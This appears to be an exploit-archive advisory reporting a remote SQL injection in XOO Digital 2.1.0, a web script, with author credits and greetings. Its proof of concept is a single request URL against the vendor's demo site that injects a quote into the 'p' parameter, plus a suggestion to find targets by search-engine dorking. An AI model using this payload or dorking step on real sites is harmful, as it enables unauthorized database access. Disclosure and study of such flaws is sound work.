XOO Digital 2.1.0 SQL Injection

XOO Digital version 2.1.0 suffers from a remote SQL injection vulnerability.

MD5 | 9818040eb97253552e16699d8221e159

====================================================================================================================================
| # Title : XOO DIGITAL v2.1.0 Sql Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit) |
| # Vendor : http://xooscripts.com/demos/xoodigital/ |
| # Dork : |
====================================================================================================================================

poc :


[+] Dorking İn Google Or Other Search Enggine.

[+] Use payload : /http://xooscripts.com/demos/xoodigital/results.php?p=1%27

[+] http://xooscripts.com/demos/xoodigital/results.php?p=1%27 <====| inject here


Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |
|
=======================================================================================================================================

Source